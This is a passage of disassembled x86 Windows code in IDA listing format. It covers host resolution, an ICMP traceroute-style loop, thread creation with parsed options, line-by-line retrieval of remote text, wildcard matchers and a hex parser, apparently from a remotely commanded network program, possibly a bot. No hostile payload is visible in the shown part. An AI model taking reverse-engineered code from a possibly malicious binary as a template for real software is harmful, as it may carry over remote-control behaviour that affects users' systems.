mov dword_41E2D8, eax
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push dword_41E2D0
call dword_417058 ; GetProcAddress
mov dword_41E2D4, eax
mov byte_41E2E0, 1
loc_409E6D: ; CODE XREF: sub_409DD0+32�j
cmp dword_41E2CC, 0
jnz short loc_409E7D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E7D: ; CODE XREF: sub_409DD0+A4�j
cmp dword_41E2D8, 0
jnz short loc_409E8D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E8D: ; CODE XREF: sub_409DD0+B4�j
cmp dword_41E2D4, 0
jnz short loc_409E9D
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E9D: ; CODE XREF: sub_409DD0+C4�j
lea eax, [ebp+var_10D]
mov [ebp+var_2B8], eax
push [ebp+var_2B8]
call dword_417244 ; inet_addr
mov [ebp+var_2BC], eax
cmp [ebp+var_2BC], 0FFFFFFFFh
jnz short loc_409F18
push [ebp+var_2B8]
call dword_41723C ; gethostbyname
mov [ebp+var_2C0], eax
cmp [ebp+var_2C0], 0
jz short loc_409F06
mov eax, [ebp+var_2C0]
movsx eax, word ptr [eax+0Ah]
push eax
mov eax, [ebp+var_2C0]
mov eax, [eax+0Ch]
push dword ptr [eax]
lea eax, [ebp+var_2BC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
jmp short loc_409F18
; ---------------------------------------------------------------------------
loc_409F06: ; CODE XREF: sub_409DD0+10D�j
push offset aCouldNotResolv ; "Could not resolve name"
call sub_416DD8 ; printf
pop ecx
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409F18: ; CODE XREF: sub_409DD0+F2�j
; sub_409DD0+134�j
and [ebp+var_4], 0
mov byte ptr [ebp+var_2B4], 1
jmp short loc_409F33
; ---------------------------------------------------------------------------
loc_409F25: ; CODE XREF: sub_409DD0:loc_40A19C�j
mov al, byte ptr [ebp+var_2B4]
add al, 1
mov byte ptr [ebp+var_2B4], al
loc_409F33: ; CODE XREF: sub_409DD0+153�j
movzx eax, byte ptr [ebp+var_2B4]
movzx ecx, [ebp+var_D]
cmp eax, ecx
jg loc_40A1A1
cmp [ebp+var_4], 0
jnz loc_40A1A1
and [ebp+var_2EC], 0
or [ebp+var_2E4], 0FFFFFFFFh
and [ebp+var_2E0], 0
and [ebp+var_2DC], 0
and [ebp+var_2D0], 0
and [ebp+var_2C8], 0
and [ebp+var_2CC], 0
and [ebp+var_2D8], 0
and [ebp+var_2D4], 0
jmp short loc_409F9E
; ---------------------------------------------------------------------------
loc_409F91: ; CODE XREF: sub_409DD0:loc_40A04E�j
mov eax, [ebp+var_2D4]
inc eax
mov [ebp+var_2D4], eax
loc_409F9E: ; CODE XREF: sub_409DD0+1BF�j
mov eax, [ebp+var_2D4]
cmp eax, [ebp+var_8]
jnb loc_40A053
cmp [ebp+var_2D8], 0
jnz loc_40A053
push 20h
push [ebp+var_C]
push [ebp+var_2B4]
lea eax, [ebp+var_2CC]
push eax
push [ebp+var_2BC]
call sub_409CB1
add esp, 14h
test eax, eax
jz short loc_40A047
cmp [ebp+var_2CC], 0
jnz short loc_40A02F
mov eax, [ebp+var_2D0]
add eax, [ebp+var_2C4]
mov [ebp+var_2D0], eax
mov eax, [ebp+var_2C4]
cmp eax, [ebp+var_2E4]
jnb short loc_40A013
mov eax, [ebp+var_2C4]
mov [ebp+var_2E4], eax
loc_40A013: ; CODE XREF: sub_409DD0+235�j
mov eax, [ebp+var_2C4]
cmp eax, [ebp+var_2DC]
jbe short loc_40A02D
mov eax, [ebp+var_2C4]
mov [ebp+var_2DC], eax
loc_40A02D: ; CODE XREF: sub_409DD0+24F�j
jmp short loc_40A045
; ---------------------------------------------------------------------------
loc_40A02F: ; CODE XREF: sub_409DD0+215�j
mov eax, [ebp+var_2CC]
mov [ebp+var_2EC], eax
mov [ebp+var_2D8], 1
loc_40A045: ; CODE XREF: sub_409DD0:loc_40A02D�j
jmp short loc_40A04E
; ---------------------------------------------------------------------------
loc_40A047: ; CODE XREF: sub_409DD0+20C�j
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_40A04E: ; CODE XREF: sub_409DD0:loc_40A045�j
jmp loc_409F91
; ---------------------------------------------------------------------------
loc_40A053: ; CODE XREF: sub_409DD0+1D7�j
; sub_409DD0+1E4�j
mov eax, [ebp+var_2C8]
mov [ebp+var_2E8], eax
cmp [ebp+var_2EC], 0
jnz short loc_40A07B
mov eax, [ebp+var_2D0]
xor edx, edx
div [ebp+var_8]
mov [ebp+var_2E0], eax
jmp short loc_40A090
; ---------------------------------------------------------------------------
loc_40A07B: ; CODE XREF: sub_409DD0+296�j
and [ebp+var_2E4], 0
and [ebp+var_2E0], 0
and [ebp+var_2DC], 0
loc_40A090: ; CODE XREF: sub_409DD0+2A9�j
cmp [ebp+var_2EC], 0
jnz loc_40A165
push 2
push 4
lea eax, [ebp+var_2E8]
push eax
call dword_417220 ; gethostbyaddr
mov [ebp+var_2F0], eax
cmp [ebp+var_2F0], 0
jz short loc_40A115
movzx eax, byte ptr [ebp+var_2E8+3]
push eax
movzx eax, byte ptr [ebp+var_2E8+2]
push eax
movzx eax, byte ptr [ebp+var_2E8+1]
push eax
movzx eax, byte ptr [ebp+var_2E8]
push eax
mov eax, [ebp+var_2F0]
push dword ptr [eax]
push [ebp+var_2DC]
push [ebp+var_2E0]
push [ebp+var_2E4]
movzx eax, byte ptr [ebp+var_2B4]
push eax
push offset dword_419594
lea eax, [ebp+var_2B0]
push eax
call sub_40D53F
add esp, 2Ch
jmp short loc_40A163
; ---------------------------------------------------------------------------
loc_40A115: ; CODE XREF: sub_409DD0+2EB�j
movzx eax, byte ptr [ebp+var_2E8+3]
push eax
movzx eax, byte ptr [ebp+var_2E8+2]
push eax
movzx eax, byte ptr [ebp+var_2E8+1]
push eax
movzx eax, byte ptr [ebp+var_2E8]
push eax
push [ebp+var_2DC]
push [ebp+var_2E0]
push [ebp+var_2E4]
movzx eax, byte ptr [ebp+var_2B4]
push eax
push offset dword_419568
lea eax, [ebp+var_2B0]
push eax
call sub_40D53F
add esp, 28h
loc_40A163: ; CODE XREF: sub_409DD0+343�j
jmp short loc_40A187
; ---------------------------------------------------------------------------
loc_40A165: ; CODE XREF: sub_409DD0+2C7�j
push [ebp+var_2EC]
movzx eax, byte ptr [ebp+var_2B4]
push eax
push offset dword_419540
lea eax, [ebp+var_2B0]
push eax
call sub_40D53F
add esp, 10h
loc_40A187: ; CODE XREF: sub_409DD0:loc_40A163�j
mov eax, [ebp+var_2BC]
cmp eax, [ebp+var_2E8]
jnz short loc_40A19C
mov [ebp+var_4], 1
loc_40A19C: ; CODE XREF: sub_409DD0+3C3�j
jmp loc_409F25
; ---------------------------------------------------------------------------
loc_40A1A1: ; CODE XREF: sub_409DD0+170�j
; sub_409DD0+17A�j
xor eax, eax
locret_40A1A3: ; CODE XREF: sub_409DD0+4F�j
; sub_409DD0+A8�j ...
leave
retn 4
sub_409DD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A1A7 proc near ; CODE XREF: sub_40A9CF+FAE�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
cmp [ebp+arg_4], 0
jnz short loc_40A1C7
push offset unk_419618
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
jmp locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A1C7: ; CODE XREF: sub_40A1A7+A�j
push 2ACh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A1E0
jmp locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A1E0: ; CODE XREF: sub_40A1A7+32�j
push 1A3h
push [ebp+arg_0]
push [ebp+var_4]
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 1A3h
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_40A22A
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
cmp eax, 0FFh
jg short loc_40A22A
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_10], eax
jmp short loc_40A231
; ---------------------------------------------------------------------------
loc_40A22A: ; CODE XREF: sub_40A1A7+63�j
; sub_40A1A7+73�j
mov [ebp+var_10], 1Eh
loc_40A231: ; CODE XREF: sub_40A1A7+81�j
mov eax, [ebp+var_4]
mov cl, byte ptr [ebp+var_10]
mov [eax+2A3h], cl
cmp [ebp+arg_C], 0
jz short loc_40A261
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
cmp eax, 927C0h
jg short loc_40A261
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_14], eax
jmp short loc_40A268
; ---------------------------------------------------------------------------
loc_40A261: ; CODE XREF: sub_40A1A7+9A�j
; sub_40A1A7+AA�j
mov [ebp+var_14], 7530h
loc_40A268: ; CODE XREF: sub_40A1A7+B8�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_14]
mov [eax+2A4h], ecx
cmp [ebp+arg_10], 0
jz short loc_40A288
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_18], eax
jmp short loc_40A28F
; ---------------------------------------------------------------------------
loc_40A288: ; CODE XREF: sub_40A1A7+D1�j
mov [ebp+var_18], 3
loc_40A28F: ; CODE XREF: sub_40A1A7+DF�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_18]
mov [eax+2A8h], ecx
lea eax, [ebp+var_C]
push eax
push 0
push [ebp+var_4]
push offset sub_409DD0
push 0
push 0
call dword_4170B4 ; CreateThread
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40A2C7
push [ebp+var_4]
call sub_416B4C ; free
pop ecx
jmp short locret_40A2D0
; ---------------------------------------------------------------------------
loc_40A2C7: ; CODE XREF: sub_40A1A7+113�j
push [ebp+var_8]
call dword_4170A4 ; CloseHandle
locret_40A2D0: ; CODE XREF: sub_40A1A7+1B�j
; sub_40A1A7+34�j ...
leave
retn
sub_40A1A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A2D2 proc near ; CODE XREF: sub_40A4A4+30�p
var_111C = dword ptr -111Ch
var_1118 = dword ptr -1118h
var_1114 = byte ptr -1114h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 111Ch
call sub_416BC0
mov eax, [ebp+arg_0]
add eax, 4
push eax
mov eax, [ebp+arg_0]
add eax, 104h
push eax
mov eax, [ebp+arg_0]
mov eax, [eax]
push dword ptr [eax]
push offset dword_41966C
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
add esp, 14h
push 2710h
push 0
push offset dword_419668
mov eax, [ebp+arg_0]
add eax, 104h
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40A339
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A339: ; CODE XREF: sub_40A2D2+5E�j
mov eax, [ebp+arg_0]
add eax, 4
push eax
push offset dword_419660
lea eax, [ebp+var_114]
push eax
call dword_4171E0 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_114]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
push eax
lea eax, [ebp+var_114]
push eax
push [ebp+var_8]
call sub_4053BF
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A38F
push [ebp+var_8]
call sub_40538D
pop ecx
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A38F: ; CODE XREF: sub_40A2D2+AB�j
push 1000h
lea eax, [ebp+var_1114]
push eax
push [ebp+var_8]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_40A3B5
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_40A3C5
loc_40A3B5: ; CODE XREF: sub_40A2D2+DB�j
push [ebp+var_8]
call sub_40538D
pop ecx
xor al, al
jmp locret_40A4A2
; ---------------------------------------------------------------------------
loc_40A3C5: ; CODE XREF: sub_40A2D2+E1�j
lea eax, [ebp+var_1114]
mov [ebp+var_10], eax
loc_40A3CE: ; CODE XREF: sub_40A2D2:loc_40A492�j
mov eax, [ebp+var_10]
mov [ebp+var_111C], eax
mov eax, [ebp+var_111C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A3E9
jmp loc_40A497
; ---------------------------------------------------------------------------
loc_40A3E9: ; CODE XREF: sub_40A2D2+110�j
push [ebp+var_111C]
call sub_407B5E
pop ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_111C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40A41B
push offset dword_418F4C
push [ebp+var_111C]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40A442
loc_40A41B: ; CODE XREF: sub_40A2D2+131�j
mov eax, [ebp+var_111C]
lea ecx, [ebp+var_1114]
cmp eax, ecx
jz short loc_40A440
push offset dword_41965C
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
pop ecx
pop ecx
loc_40A440: ; CODE XREF: sub_40A2D2+157�j
jmp short loc_40A458
; ---------------------------------------------------------------------------
loc_40A442: ; CODE XREF: sub_40A2D2+147�j
push [ebp+var_111C]
mov eax, [ebp+arg_0]
add eax, 204h
push eax
call sub_40D53F
pop ecx
pop ecx
loc_40A458: ; CODE XREF: sub_40A2D2:loc_40A440�j
push 3E8h
call dword_41709C ; Sleep
push offset dword_41E2A8
call sub_409C6C
pop ecx
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax+4]
mov [ebp+var_1118], eax
push offset dword_41E2A8
call sub_409C7A
pop ecx
cmp [ebp+var_1118], 0
jz short loc_40A492
jmp short loc_40A497
; ---------------------------------------------------------------------------
loc_40A492: ; CODE XREF: sub_40A2D2+1BC�j
jmp loc_40A3CE
; ---------------------------------------------------------------------------
loc_40A497: ; CODE XREF: sub_40A2D2+112�j
; sub_40A2D2+1BE�j
push [ebp+var_8]
call sub_40538D
pop ecx
mov al, 1
locret_40A4A2: ; CODE XREF: sub_40A2D2+62�j
; sub_40A2D2+B8�j ...
leave
retn
sub_40A2D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A4A4 proc near ; DATA XREF: sub_40A50E+A1�o
var_3A8 = dword ptr -3A8h
var_2A4 = byte ptr -2A4h
var_1A4 = byte ptr -1A4h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3A8h
push 3A7h
push [ebp+arg_0]
lea eax, [ebp+var_3A8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_3A8]
push eax
call sub_40A2D2
pop ecx
movzx eax, al
test eax, eax
jnz short loc_40A4FC
lea eax, [ebp+var_2A4]
push eax
push offset dword_419698
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40A4FC: ; CODE XREF: sub_40A4A4+3B�j
push [ebp+var_3A8]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_40A4A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A50E proc near ; CODE XREF: sub_40A9CF+FE3�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_40A51D
jmp locret_40A5BC
; ---------------------------------------------------------------------------
loc_40A51D: ; CODE XREF: sub_40A50E+8�j
push 3A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40A536
jmp locret_40A5BC
; ---------------------------------------------------------------------------
loc_40A536: ; CODE XREF: sub_40A50E+21�j
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_40A562
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40A586
; ---------------------------------------------------------------------------
loc_40A562: ; CODE XREF: sub_40A50E+3D�j
push offset dword_4196D4
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+var_4]
add eax, 104h
push eax
call sub_4105FB
pop ecx
loc_40A586: ; CODE XREF: sub_40A50E+52�j
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 204h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_4196B4
push 0
push [ebp+var_4]
push offset sub_40A4A4
call sub_4095A4
add esp, 18h
locret_40A5BC: ; CODE XREF: sub_40A50E+A�j
; sub_40A50E+23�j
leave
retn
sub_40A50E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A5BE proc near ; CODE XREF: sub_40A5BE+32�p
; sub_40A5BE+70�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A603
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A5DD
mov al, 1
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A5DD: ; CODE XREF: sub_40A5BE+16�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A5FC
mov eax, [ebp+arg_4]
inc eax
push eax
push [ebp+arg_0]
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A5FC: ; CODE XREF: sub_40A5BE+28�j
xor al, al
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A603: ; CODE XREF: sub_40A5BE+C�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A614
xor al, al
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A614: ; CODE XREF: sub_40A5BE+4D�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A63A
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A63A: ; CODE XREF: sub_40A5BE+64�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40A65B
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A65B: ; CODE XREF: sub_40A5BE+85�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A69E
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_40A67C
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 39h
jle short loc_40A687
loc_40A67C: ; CODE XREF: sub_40A5BE+B1�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A69A
loc_40A687: ; CODE XREF: sub_40A5BE+BC�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A69A: ; CODE XREF: sub_40A5BE+C7�j
xor al, al
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A69E: ; CODE XREF: sub_40A5BE+A6�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A6E7
and [ebp+var_4], 0
jmp short loc_40A6B6
; ---------------------------------------------------------------------------
loc_40A6AF: ; CODE XREF: sub_40A5BE:loc_40A6E5�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40A6B6: ; CODE XREF: sub_40A5BE+EF�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call sub_40A5BE
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40A6D4
mov al, 1
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A6D4: ; CODE XREF: sub_40A5BE+110�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A6E5
xor al, al
jmp short locret_40A6E9
; ---------------------------------------------------------------------------
loc_40A6E5: ; CODE XREF: sub_40A5BE+121�j
jmp short loc_40A6AF
; ---------------------------------------------------------------------------
loc_40A6E7: ; CODE XREF: sub_40A5BE+E9�j
xor al, al
locret_40A6E9: ; CODE XREF: sub_40A5BE+1A�j
; sub_40A5BE+39�j ...
leave
retn
sub_40A5BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A6EB proc near ; CODE XREF: sub_4097A7+10A�p
; sub_4098F3+155�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A730
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A70A
mov al, 1
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A70A: ; CODE XREF: sub_40A6EB+16�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A729
mov eax, [ebp+arg_4]
inc eax
push eax
push [ebp+arg_0]
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A729: ; CODE XREF: sub_40A6EB+28�j
xor al, al
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A730: ; CODE XREF: sub_40A6EB+C�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A741
xor al, al
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A741: ; CODE XREF: sub_40A6EB+4D�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A767
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A767: ; CODE XREF: sub_40A6EB+64�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 41h
jl short loc_40A77D
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 5Ah
jle short loc_40A793
loc_40A77D: ; CODE XREF: sub_40A6EB+85�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 61h
jl short loc_40A7BC
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 7Ah
jg short loc_40A7BC
loc_40A793: ; CODE XREF: sub_40A6EB+90�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
xor eax, 20h
mov ecx, [ebp+arg_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_40A7BC
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A7BC: ; CODE XREF: sub_40A6EB+9B�j
; sub_40A6EB+A6�j ...
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40A7DD
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp locret_40A86B
; ---------------------------------------------------------------------------
loc_40A7DD: ; CODE XREF: sub_40A6EB+DA�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A820
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_40A7FE
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 39h
jle short loc_40A809
loc_40A7FE: ; CODE XREF: sub_40A6EB+106�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40A81C
loc_40A809: ; CODE XREF: sub_40A6EB+111�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40A6EB
pop ecx
pop ecx
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A81C: ; CODE XREF: sub_40A6EB+11C�j
xor al, al
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A820: ; CODE XREF: sub_40A6EB+FB�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 2Ah
jnz short loc_40A869
and [ebp+var_4], 0
jmp short loc_40A838
; ---------------------------------------------------------------------------
loc_40A831: ; CODE XREF: sub_40A6EB:loc_40A867�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40A838: ; CODE XREF: sub_40A6EB+144�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40A856
mov al, 1
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A856: ; CODE XREF: sub_40A6EB+165�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40A867
xor al, al
jmp short locret_40A86B
; ---------------------------------------------------------------------------
loc_40A867: ; CODE XREF: sub_40A6EB+176�j
jmp short loc_40A831
; ---------------------------------------------------------------------------
loc_40A869: ; CODE XREF: sub_40A6EB+13E�j
xor al, al
locret_40A86B: ; CODE XREF: sub_40A6EB+1A�j
; sub_40A6EB+39�j ...
leave
retn
sub_40A6EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A86D proc near ; CODE XREF: sub_40A8AD+FD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_4], 1
cmp [ebp+arg_4], 0
jnz short loc_40A884
push 1
pop eax
jmp short locret_40A8AB
; ---------------------------------------------------------------------------
loc_40A884: ; CODE XREF: sub_40A86D+10�j
mov [ebp+var_8], 1
jmp short loc_40A894
; ---------------------------------------------------------------------------
loc_40A88D: ; CODE XREF: sub_40A86D+39�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40A894: ; CODE XREF: sub_40A86D+1E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
loc_40A89A: ; DATA XREF: .data:0041AE78�o
; .data:0041AEBC�o ...
jg short loc_40A8A8
mov eax, [ebp+var_4]
imul eax, [ebp+arg_0]
mov [ebp+var_4], eax
jmp short loc_40A88D
; ---------------------------------------------------------------------------
loc_40A8A8: ; CODE XREF: sub_40A86D:loc_40A89A�j
mov eax, [ebp+var_4]
locret_40A8AB: ; CODE XREF: sub_40A86D+15�j
leave
retn
sub_40A86D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A8AD proc near ; CODE XREF: sub_406509+26�p
; sub_40A9CF+193F�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push esi
push edi
mov [ebp+var_4], 1
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_20], 0
mov esi, offset aAbcdef ; "abcdef"
lea edi, [ebp+var_1C]
movsd
movsw
movsb
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 30h
jnz short loc_40A90C
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 78h
jz short loc_40A905
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 58h
jnz short loc_40A90C
loc_40A905: ; CODE XREF: sub_40A8AD+48�j
